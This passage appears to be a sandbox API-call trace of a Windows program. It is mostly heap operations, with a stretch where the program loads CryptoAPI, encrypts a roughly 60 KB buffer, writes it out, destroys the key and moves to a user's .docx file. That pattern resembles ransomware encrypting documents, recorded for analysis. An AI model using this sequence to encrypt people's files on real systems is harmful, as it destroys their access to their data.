[0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0078.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0078.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0078.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0078.060] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0078.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0078.061] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e2540, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2540*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0078.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0078.063] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.063] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.063] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0078.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0078.064] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca898, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.066] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xeafd, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xeb00) returned 1 [0078.066] CharLowerBuffW (in: lpsz="byte[60161]", cchLength=0xb | out: lpsz="byte[60161]") returned 0xb [0078.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.068] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x491c160*, pdwDataLen=0x144e790*=0xeafd, dwBufLen=0xeb00 | out: pbData=0x491c160*, pdwDataLen=0x144e790*=0xeb00) returned 1 [0078.068] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.068] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.068] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.069] WriteFile (in: hFile=0x258, lpBuffer=0x49a8b10*, nNumberOfBytesToWrite=0xeb00, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49a8b10*, lpNumberOfBytesWritten=0x144f194*=0xeb00, lpOverlapped=0x0) returned 1 [0078.072] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0078.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca580, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0078.072] CryptDestroyKey (hKey=0x41ac540) returned 1 [0078.072] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.072] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.072] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0078.073] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0078.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.073] FreeLibrary (hLibModule=0x756e0000) returned 1 [0078.073] CloseHandle (hObject=0x298) returned 1 [0078.073] CloseHandle (hObject=0x258) returned 1 [0078.129] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx", 